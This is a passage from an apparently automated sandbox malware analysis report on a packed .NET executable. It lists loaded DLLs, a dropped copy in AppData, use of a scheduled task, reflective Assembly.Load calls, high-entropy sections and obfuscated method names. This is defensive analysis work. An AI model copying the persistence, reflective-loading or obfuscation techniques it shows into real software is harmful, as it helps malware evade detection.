                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: nzLoHpgAln.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: nzLoHpgAln.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeUnpacked PE file: 0.2.nzLoHpgAln.exe.40000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeUnpacked PE file: 0.2.nzLoHpgAln.exe.40000.0.unpack
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, EDIZWacnsQLqU7bbhP.cs.Net Code: cLg7QZLUNs System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, EDIZWacnsQLqU7bbhP.cs.Net Code: cLg7QZLUNs System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.nzLoHpgAln.exe.3c71a18.1.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.nzLoHpgAln.exe.93c0000.5.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, EDIZWacnsQLqU7bbhP.cs.Net Code: cLg7QZLUNs System.Reflection.Assembly.Load(byte[])
                  Source: 10.2.wZWwzQVEakJvEU.exe.44b3ad8.4.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, EDIZWacnsQLqU7bbhP.cs.Net Code: cLg7QZLUNs System.Reflection.Assembly.Load(byte[])
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, EDIZWacnsQLqU7bbhP.cs.Net Code: cLg7QZLUNs System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_00042182 push FFFFFFB1h; retf 0_2_00042184
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_000420F3 push ss; ret 0_2_000420F9
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_0004227A push ecx; ret 0_2_0004227B
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_008122C7 push edi; retf 0_2_008122CD
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09C3C5D0 push es; retn 0009h0_2_09C3C5D2
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09C3C5A9 push es; retn 0009h0_2_09C3C5AA
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09C3DBE9 push ss; retn 0009h0_2_09C3DBEA
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09C3DD38 push edi; retn 0009h0_2_09C3DD3A
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09C3D239 push cs; retn 0009h0_2_09C3D23A
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09F4CCA0 push 09F4CFEFh; iretd 0_2_09F4CFE3
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09F40979 pushfd ; retn 0009h0_2_09F4097A
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09F404E8 push esp; ret 0_2_09F404E9
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 8_2_06712DB8 pushad ; retf 5505h8_2_06712EB6
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB22C7 push edi; retf 10_2_00FB22CD
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_0A0404E8 push esp; ret 10_2_0A0404E9
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 14_2_06A9E5C0 push es; ret 14_2_06A9E5D0
                  Source: nzLoHpgAln.exeStatic PE information: section name: .text entropy: 7.677345826852639
                  Source: wZWwzQVEakJvEU.exe.0.drStatic PE information: section name: .text entropy: 7.677345826852639
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, Vs82vkHUR5m9RCYE2bP.csHigh entropy of concatenated method names: 'ToString', 'KfX6BMTyh7', 'xB76Kn2Wpo', 'zuV6Ze8RcL', 'FZw63IgMg0', 'l4a6FPHtQ6', 'MAG6Td04QD', 'kYv6t6R6yY', 'GjZfER1IO7Ml5BMDRtH', 'GL7pWy1Z0kwjW3OdYep'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, lF62eOBaEgEorXmRSl.csHigh entropy of concatenated method names: 'iwRDfGIkgE', 'QjYDh8EXqc', 'SsPDWoPN32', 'GmADMksnIc', 'Is6D1jKVbG', 'I5kDwCg0R9', 'YkMDxlMml4', 'cqUDNP7QiU', 'aEPD4EPsAy', 'FH7DL0Asye'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, Dqnxs234kMblUpWIWe.csHigh entropy of concatenated method names: 'THiGewLSWx', 'xvbGDWOODP', 'cWbGuULGWK', 'naCGy2oX6x', 'd7vGcBa6cO', 'eyou1dQ4pM', 'kbnuwftVYT', 'PYuuxbMh1B', 'XjeuN4ZoT4', 'k4Cu4iBqPt'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, R9ihZtK1dSap2DSgRG.csHigh entropy of concatenated method names: 'xH1qEPtVAl', 'gMtqbbJkpd', 'JlpqB25eCM', 'NoiqKaCu0X', 'DCPqiDF8Xt', 'BbBqI1vGgK', 'nZwqYiIpom', 'VETqSJfEol', 'sLqqseFf6k', 'zjNqmjeRt4'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, rdDn9AZRble9iQ9Uqj.csHigh entropy of concatenated method names: 'EequOEL5lC', 'NbIu51eamH', 'qyuqTnnIpG', 'M2Qqt1KgVv', 'Op1qrcmPaR', 'JuFqabP01V', 'QoQqV1PoE2', 'grQq8864NF', 'Np6qjdLkrD', 'BpCqnYSTOk'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, hKo5edfWLak4Bbqtne.csHigh entropy of concatenated method names: 'uDMin9kJ4j', 'TwiipFCVU9', 'yBAiflrCy8', 'jJHihWOmfb', 'WaDiFLfcme', 'O5kiTrdenj', 'nSYitbxRXp', 'dd4irfONIq', 'AwmiaheyoW', 'QXwiVnSATc'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, WTdydw7kwQos9Ag2hA.csHigh entropy of concatenated method names: 'XnJHyF62eO', 'KEgHcEorXm', 'I1dHXSap2D', 'rgRHdGsdDn', 'z9UHiqjBqn', 'Vs2HI4kMbl', 'FBdE0xi06QEIGbChRo', 'zIcGsgCEAFGoBOwjJW', 'OcsHH4wRHq', 'm1eHlQwcuZ'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, c2189dMeFcQwlCkDNo.csHigh entropy of concatenated method names: 'tycYXgX4IL', 'xcAYdeKiZv', 'ToString', 'vmMYCTO6V4', 'DoYYDU59PA', 'wuwYqhlbkT', 'MRyYulAB1T', 'NnnYGlmcnN', 'pl7YyLS7WE', 'EolYctOKcZ'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, JbGBKdj6ZIOo4f2BPQ.csHigh entropy of concatenated method names: 'NpFygJGQoy', 'ok3yk3YCOq', 'dHtyQNfrGo', 'B11yEmuFYr', 'i7XyOZetDI', 'MrRybkJ58q', 'o9Ay50huCS', 'W4XyBGlK6A', 'HYHyKiPwKX', 'KF4yZdU6lb'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, EDIZWacnsQLqU7bbhP.csHigh entropy of concatenated method names: 'dIWleBJaUb', 'fuJlCU5pPg', 'PT9lDBVKdx', 'PSalq1OK3O', 'dyXluwojvM', 'IpBlG2Bi8w', 'OsvlyjvwpG', 'FTClcGgLKf', 'qbJlJr3LlC', 'nsylXUVP8L'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, DgkowV47Dh3Fxfd92L.csHigh entropy of concatenated method names: 'hfps3nV9Au', 'U26sFkKC7K', 'BnDsThiqJu', 'UShstLseQu', 'QebsrlHGXx', 'QeTsayQhIQ', 'pPZsVs0YpI', 'nEss8RKrgy', 'SDqsjhSJZ0', 'gWEsnyEyGT'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, fKewcCzIDSttxbv6Cl.csHigh entropy of concatenated method names: 'GZomb8TeAX', 'rcQmBfQBPY', 'RDSmKKcrYt', 'r4gm3oGsfC', 'a3hmFiCyox', 'bkvmt3aMEB', 'jx3mrdiQhQ', 'Skom2cVmJ4', 'nR7mg88OKt', 't5DmkSyAqW'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, T2nxZyWI6ZVQTBtP96.csHigh entropy of concatenated method names: 'ToString', 'FHbIv7sdct', 'e7OIFs3HOA', 'r5IIThqPl3', 'i2RItKsG4k', 'QOjIr5yarH', 'FvNIaqr3Xo', 'Ud9IVYa8YE', 'DXEI8UseS8', 'LPuIjuyE7K'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, ssoHYO9CZv0DV6pGUv.csHigh entropy of concatenated method names: 'xGk0BfZgTU', 'gZj0KItla1', 'aUh03ytvB5', 'BNf0FbQD43', 'Dts0tFSCEY', 'Qow0rsiLsP', 'GCF0V1nuab', 'eFg08jmurs', 'qfS0nPubql', 'Ole0v8nioF'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, fJ02oKDU7jd18ANgNc.csHigh entropy of concatenated method names: 'Dispose', 'EHTH4bcHbO', 'bxFUF2orfZ', 'hdFJYAgReD', 'TrNHLv6dJo', 'dukHz147Cw', 'ProcessDialogKey', 'YZBUAgkowV', 'dDhUH3Fxfd', 'Q2LUUNnxfd'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, XnxfdvL1wIjOTvPVmK.csHigh entropy of concatenated method names: 'b1lmqgUa6q', 'dtAmu26Sir', 'D3fmGtYCAc', 'wJKmyNZJqJ', 'zTKmsBJyyJ', 'hdYmcQ0id4', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, HFhy6EHAGyTn8yOrkLt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pK6mvVucic', 'JtrmpeQLM3', 'Sj9m9uh2y0', 'fIXmfoD3VK', 't3imh4jJWk', 'oeFmWXtOZX', 'bvAmMJDc11'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, DKJ6PHUd9naUoeJCna.csHigh entropy of concatenated method names: 'swwQFFQbu', 'io5EBuFGC', 'sFfb8pyx1', 'JUl5kqrHa', 'uJXKOHA5M', 'hS3ZZ14sQ', 'k18oVIv0U7RiOT8Orh', 'k5o1tYNsT2YnI8ljjy', 'PvkSr46vN', 'hchmanBLj'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, tViMi8xroKHTbcHbOM.csHigh entropy of concatenated method names: 'aaEsia69pk', 'zpNsYrnPZM', 'd2Hss3R6Jb', 't53s6HZgj2', 'A1rsRGpI5M', 'UCgs2aWcZJ', 'Dispose', 'pIoSCYEost', 'QAjSD4uYAe', 'fn3SqRpg9H'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, k27kfyHHonG7KUUcJBK.csHigh entropy of concatenated method names: 'z0WmLhK6XD', 'SdDmzeA4lF', 'tIn6ABldAN', 'RbZ6HWVHCS', 'Hjm6Ub5XDP', 'jKI6lp5iCZ', 'BJe67OKeqo', 'Ds46ejlZDk', 'NgQ6CpOQh7', 'Dcm6DoFoI7'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, bXPpnuV1cYWsbLvy9E.csHigh entropy of concatenated method names: 'VyuyCViDFQ', 'UgnyquY8I5', 'fT2yGZruLQ', 'zq9GLL2n9k', 'kh4GzwBHBD', 'l9QyAIhQdQ', 'hxvyHf4xuM', 'uKRyUrXavS', 't1qylB4iI0', 'hJ7y7B4cdM'
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, BZ0TvmwFdgLu3v1uns.csHigh entropy of concatenated method names: 'xU6YNrTpfQ', 'MHqYLww1DE', 'IRFSAAuVEM', 'UfiSHJpDRa', 'co0YvMY0kI', 'XS9YpvAFDs', 'tvyY9e2WWn', 'ooMYfhOr4q', 'rKvYhVrSHl', 'kVqYWoZpFC'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, Vs82vkHUR5m9RCYE2bP.csHigh entropy of concatenated method names: 'ToString', 'KfX6BMTyh7', 'xB76Kn2Wpo', 'zuV6Ze8RcL', 'FZw63IgMg0', 'l4a6FPHtQ6', 'MAG6Td04QD', 'kYv6t6R6yY', 'GjZfER1IO7Ml5BMDRtH', 'GL7pWy1Z0kwjW3OdYep'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, lF62eOBaEgEorXmRSl.csHigh entropy of concatenated method names: 'iwRDfGIkgE', 'QjYDh8EXqc', 'SsPDWoPN32', 'GmADMksnIc', 'Is6D1jKVbG', 'I5kDwCg0R9', 'YkMDxlMml4', 'cqUDNP7QiU', 'aEPD4EPsAy', 'FH7DL0Asye'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, Dqnxs234kMblUpWIWe.csHigh entropy of concatenated method names: 'THiGewLSWx', 'xvbGDWOODP', 'cWbGuULGWK', 'naCGy2oX6x', 'd7vGcBa6cO', 'eyou1dQ4pM', 'kbnuwftVYT', 'PYuuxbMh1B', 'XjeuN4ZoT4', 'k4Cu4iBqPt'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, R9ihZtK1dSap2DSgRG.csHigh entropy of concatenated method names: 'xH1qEPtVAl', 'gMtqbbJkpd', 'JlpqB25eCM', 'NoiqKaCu0X', 'DCPqiDF8Xt', 'BbBqI1vGgK', 'nZwqYiIpom', 'VETqSJfEol', 'sLqqseFf6k', 'zjNqmjeRt4'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, rdDn9AZRble9iQ9Uqj.csHigh entropy of concatenated method names: 'EequOEL5lC', 'NbIu51eamH', 'qyuqTnnIpG', 'M2Qqt1KgVv', 'Op1qrcmPaR', 'JuFqabP01V', 'QoQqV1PoE2', 'grQq8864NF', 'Np6qjdLkrD', 'BpCqnYSTOk'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, hKo5edfWLak4Bbqtne.csHigh entropy of concatenated method names: 'uDMin9kJ4j', 'TwiipFCVU9', 'yBAiflrCy8', 'jJHihWOmfb', 'WaDiFLfcme', 'O5kiTrdenj', 'nSYitbxRXp', 'dd4irfONIq', 'AwmiaheyoW', 'QXwiVnSATc'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, WTdydw7kwQos9Ag2hA.csHigh entropy of concatenated method names: 'XnJHyF62eO', 'KEgHcEorXm', 'I1dHXSap2D', 'rgRHdGsdDn', 'z9UHiqjBqn', 'Vs2HI4kMbl', 'FBdE0xi06QEIGbChRo', 'zIcGsgCEAFGoBOwjJW', 'OcsHH4wRHq', 'm1eHlQwcuZ'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, c2189dMeFcQwlCkDNo.csHigh entropy of concatenated method names: 'tycYXgX4IL', 'xcAYdeKiZv', 'ToString', 'vmMYCTO6V4', 'DoYYDU59PA', 'wuwYqhlbkT', 'MRyYulAB1T', 'NnnYGlmcnN', 'pl7YyLS7WE', 'EolYctOKcZ'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, JbGBKdj6ZIOo4f2BPQ.csHigh entropy of concatenated method names: 'NpFygJGQoy', 'ok3yk3YCOq', 'dHtyQNfrGo', 'B11yEmuFYr', 'i7XyOZetDI', 'MrRybkJ58q', 'o9Ay50huCS', 'W4XyBGlK6A', 'HYHyKiPwKX', 'KF4yZdU6lb'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, EDIZWacnsQLqU7bbhP.csHigh entropy of concatenated method names: 'dIWleBJaUb', 'fuJlCU5pPg', 'PT9lDBVKdx', 'PSalq1OK3O', 'dyXluwojvM', 'IpBlG2Bi8w', 'OsvlyjvwpG', 'FTClcGgLKf', 'qbJlJr3LlC', 'nsylXUVP8L'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, DgkowV47Dh3Fxfd92L.csHigh entropy of concatenated method names: 'hfps3nV9Au', 'U26sFkKC7K', 'BnDsThiqJu', 'UShstLseQu', 'QebsrlHGXx', 'QeTsayQhIQ', 'pPZsVs0YpI', 'nEss8RKrgy', 'SDqsjhSJZ0', 'gWEsnyEyGT'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, fKewcCzIDSttxbv6Cl.csHigh entropy of concatenated method names: 'GZomb8TeAX', 'rcQmBfQBPY', 'RDSmKKcrYt', 'r4gm3oGsfC', 'a3hmFiCyox', 'bkvmt3aMEB', 'jx3mrdiQhQ', 'Skom2cVmJ4', 'nR7mg88OKt', 't5DmkSyAqW'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, T2nxZyWI6ZVQTBtP96.csHigh entropy of concatenated method names: 'ToString', 'FHbIv7sdct', 'e7OIFs3HOA', 'r5IIThqPl3', 'i2RItKsG4k', 'QOjIr5yarH', 'FvNIaqr3Xo', 'Ud9IVYa8YE', 'DXEI8UseS8', 'LPuIjuyE7K'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, ssoHYO9CZv0DV6pGUv.csHigh entropy of concatenated method names: 'xGk0BfZgTU', 'gZj0KItla1', 'aUh03ytvB5', 'BNf0FbQD43', 'Dts0tFSCEY', 'Qow0rsiLsP', 'GCF0V1nuab', 'eFg08jmurs', 'qfS0nPubql', 'Ole0v8nioF'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, fJ02oKDU7jd18ANgNc.csHigh entropy of concatenated method names: 'Dispose', 'EHTH4bcHbO', 'bxFUF2orfZ', 'hdFJYAgReD', 'TrNHLv6dJo', 'dukHz147Cw', 'ProcessDialogKey', 'YZBUAgkowV', 'dDhUH3Fxfd', 'Q2LUUNnxfd'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, XnxfdvL1wIjOTvPVmK.csHigh entropy of concatenated method names: 'b1lmqgUa6q', 'dtAmu26Sir', 'D3fmGtYCAc', 'wJKmyNZJqJ', 'zTKmsBJyyJ', 'hdYmcQ0id4', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, HFhy6EHAGyTn8yOrkLt.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pK6mvVucic', 'JtrmpeQLM3', 'Sj9m9uh2y0', 'fIXmfoD3VK', 't3imh4jJWk', 'oeFmWXtOZX', 'bvAmMJDc11'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, DKJ6PHUd9naUoeJCna.csHigh entropy of concatenated method names: 'swwQFFQbu', 'io5EBuFGC', 'sFfb8pyx1', 'JUl5kqrHa', 'uJXKOHA5M', 'hS3ZZ14sQ', 'k18oVIv0U7RiOT8Orh', 'k5o1tYNsT2YnI8ljjy', 'PvkSr46vN', 'hchmanBLj'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, tViMi8xroKHTbcHbOM.csHigh entropy of concatenated method names: 'aaEsia69pk', 'zpNsYrnPZM', 'd2Hss3R6Jb', 't53s6HZgj2', 'A1rsRGpI5M', 'UCgs2aWcZJ', 'Dispose', 'pIoSCYEost', 'QAjSD4uYAe', 'fn3SqRpg9H'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, k27kfyHHonG7KUUcJBK.csHigh entropy of concatenated method names: 'z0WmLhK6XD', 'SdDmzeA4lF', 'tIn6ABldAN', 'RbZ6HWVHCS', 'Hjm6Ub5XDP', 'jKI6lp5iCZ', 'BJe67OKeqo', 'Ds46ejlZDk', 'NgQ6CpOQh7', 'Dcm6DoFoI7'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, bXPpnuV1cYWsbLvy9E.csHigh entropy of concatenated method names: 'VyuyCViDFQ', 'UgnyquY8I5', 'fT2yGZruLQ', 'zq9GLL2n9k', 'kh4GzwBHBD', 'l9QyAIhQdQ', 'hxvyHf4xuM', 'uKRyUrXavS', 't1qylB4iI0', 'hJ7y7B4cdM'
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, BZ0TvmwFdgLu3v1uns.csHigh entropy of concatenated method names: 'xU6YNrTpfQ', 'MHqYLww1DE', 'IRFSAAuVEM', 'UfiSHJpDRa', 'co0YvMY0kI', 'XS9YpvAFDs', 'tvyY9e2WWn', 'ooMYfhOr4q', 'rKvYhVrSHl', 'kVqYWoZpFC'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, Vs82vkHUR5m9RCYE2bP.csHigh entropy of concatenated method names: 'ToString', 'KfX6BMTyh7', 'xB76Kn2Wpo', 'zuV6Ze8RcL', 'FZw63IgMg0', 'l4a6FPHtQ6', 'MAG6Td04QD', 'kYv6t6R6yY', 'GjZfER1IO7Ml5BMDRtH', 'GL7pWy1Z0kwjW3OdYep'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, lF62eOBaEgEorXmRSl.csHigh entropy of concatenated method names: 'iwRDfGIkgE', 'QjYDh8EXqc', 'SsPDWoPN32', 'GmADMksnIc', 'Is6D1jKVbG', 'I5kDwCg0R9', 'YkMDxlMml4', 'cqUDNP7QiU', 'aEPD4EPsAy', 'FH7DL0Asye'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, Dqnxs234kMblUpWIWe.csHigh entropy of concatenated method names: 'THiGewLSWx', 'xvbGDWOODP', 'cWbGuULGWK', 'naCGy2oX6x', 'd7vGcBa6cO', 'eyou1dQ4pM', 'kbnuwftVYT', 'PYuuxbMh1B', 'XjeuN4ZoT4', 'k4Cu4iBqPt'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, R9ihZtK1dSap2DSgRG.csHigh entropy of concatenated method names: 'xH1qEPtVAl', 'gMtqbbJkpd', 'JlpqB25eCM', 'NoiqKaCu0X', 'DCPqiDF8Xt', 'BbBqI1vGgK', 'nZwqYiIpom', 'VETqSJfEol', 'sLqqseFf6k', 'zjNqmjeRt4'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, rdDn9AZRble9iQ9Uqj.csHigh entropy of concatenated method names: 'EequOEL5lC', 'NbIu51eamH', 'qyuqTnnIpG', 'M2Qqt1KgVv', 'Op1qrcmPaR', 'JuFqabP01V', 'QoQqV1PoE2', 'grQq8864NF', 'Np6qjdLkrD', 'BpCqnYSTOk'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, hKo5edfWLak4Bbqtne.csHigh entropy of concatenated method names: 'uDMin9kJ4j', 'TwiipFCVU9', 'yBAiflrCy8', 'jJHihWOmfb', 'WaDiFLfcme', 'O5kiTrdenj', 'nSYitbxRXp', 'dd4irfONIq', 'AwmiaheyoW', 'QXwiVnSATc'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, WTdydw7kwQos9Ag2hA.csHigh entropy of concatenated method names: 'XnJHyF62eO', 'KEgHcEorXm', 'I1dHXSap2D', 'rgRHdGsdDn', 'z9UHiqjBqn', 'Vs2HI4kMbl', 'FBdE0xi06QEIGbChRo', 'zIcGsgCEAFGoBOwjJW', 'OcsHH4wRHq', 'm1eHlQwcuZ'
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, c2189dMeFcQwlCkDNo.csHigh entropy of concatenated method names: 'tycYXgX4IL', 'xcAYdeKiZv', 'ToString', 'vmMYCTO6V4', 'DoYYDU59PA', 'wuwYqhlbkT', 'MRyYulAB1T', 'NnnYGlmcnN', 'pl7YyLS7WE', 'EolYctOKcZ'
